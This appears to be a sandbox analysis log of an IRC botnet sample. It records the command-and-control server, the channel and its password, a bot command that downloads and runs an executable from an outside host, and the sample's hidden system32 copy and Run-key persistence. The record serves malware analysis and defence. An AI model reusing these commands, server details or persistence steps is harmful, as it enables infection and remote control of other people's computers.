us.unicatz.com 74.117.174.82
C&C Server: 74.117.174.82:2010
Server Password:
Username: okcbisjs
Nickname: okcbisjs
Channel: #us# (Password: d0s)
Channeltopic: :
Now talking in #us#
Topic On: [ #us# ] [ .msn.addcontact wingate32.exe wingate32.zip wingate32.rar estas foto son toyo? estas foto son toyo? ]
Topic By: [ dgdg ]
(dgdg) .l huh
(dgdg) .down http://attacke.100free.com/inanaged.exe c:\inanaged.exe 1
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MSN" = C:\Windows\system32\Windirs32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
File Changes by all processes
New Files
\Device\Tcp
\Device\Ip
\Device\Ip
C:\Windows\system32\Windirs32.exe
\Device\Tcp
\Device\Ip
\Device\Ip
C:\Windows\system32\Windirs32.exe
\Device\RasAcd
Opened Files
\\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\Windows\system32
\\.\Ip
Deleted Files
Chronological Order
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\Windows\system32\Windirs32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\f3024245d512ddb9abcb5558860c0c7d to C:\Windows\system32\Windirs32.exe
Set File Attributes: C:\Windows\system32\Windirs32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\Windows\system32 ()
Find File: C:\WINDOWS\system32\Windirs32.exe
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\Windows\system32\Windirs32.exe Flags: (SECURITY_ANONYMOUS)
Set File Attributes: C:\Windows\system32\Windirs32.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Copy File: C:\Windows\system32\Windirs32.exe to C:\Windows\system32\Windirs32.exe
Set File Attributes: C:\Windows\system32\Windirs32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)